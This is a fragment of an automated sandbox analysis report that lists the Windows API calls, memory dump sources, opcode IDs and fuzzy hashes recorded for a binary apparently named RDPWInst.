                                                                                                              • API String ID: 3192549508-1194432280
                                                                                                              APIs
                                                                                                              • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00405906
                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_0000589C), ref: 00405943
                                                                                                              Strings
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                              • String ID: $$@
                                                                                                              • API String ID: 3192549508-1194432280
                                                                                                              APIs
                                                                                                              • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00411595), ref: 0041152C
                                                                                                              • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00411595), ref: 00411532
                                                                                                              Strings
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DateFormatLocaleThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 3303714858-3916222277
                                                                                                              APIs
                                                                                                              • GetThreadLocale.KERNEL32 ref: 00415102
                                                                                                              • GetSystemMetrics.USER32(0000004A), ref: 00415153
                                                                                                              Strings
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LocaleMetricsSystemThread
                                                                                                              • String ID: p[D
                                                                                                              • API String ID: 3035471613-2202972244
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00447324,00443D31,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043A693
                                                                                                                • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
                                                                                                              Strings
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                              • API String ID: 1646373207-3689287502
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00447324,00443E55,000001F4,000001F4,000003E8,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043A72F
                                                                                                                • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
                                                                                                              Strings
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                              • API String ID: 1646373207-1355242751
                                                                                                              • Opcode ID: 349a73e186955f1baf5885772f004c34863de15e74dc15c33fb7743de3b5e964
                                                                                                              • Instruction ID: 7f98099b70b18dc0c665e624c368f4c8ddeaec672eef30118536404a03429535
                                                                                                              • Opcode Fuzzy Hash: 349a73e186955f1baf5885772f004c34863de15e74dc15c33fb7743de3b5e964
                                                                                                              • Instruction Fuzzy Hash: FBE0C2013883C21EE60272F90DD1B3A17D84B6C308F24183FB1C0D1183DB9CC524862F
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,0044313B,00000000,0044315A), ref: 00415B46
                                                                                                                • Part of subcall function 0040AA94: GetProcAddress.KERNEL32(?,?), ref: 0040AAB8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmp
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                                                                              • API String ID: 1646373207-1127948838
                                                                                                              • Opcode ID: a738386b4eb64180ba5d2c03a1b622a8c2aaab42401b0cdd019b227c0ec9c639
                                                                                                              • Instruction ID: 4ad585b0bbb22d8cb86f0bca7bf1fd5c676b9542b5302fef9f3b12a8682de55f
                                                                                                              • Opcode Fuzzy Hash: a738386b4eb64180ba5d2c03a1b622a8c2aaab42401b0cdd019b227c0ec9c639
                                                                                                              • Instruction Fuzzy Hash: 92D0C7B4745F85DBFF10DBA55D83BD62254E785309B10043B70046D2D3D67C6894CB1D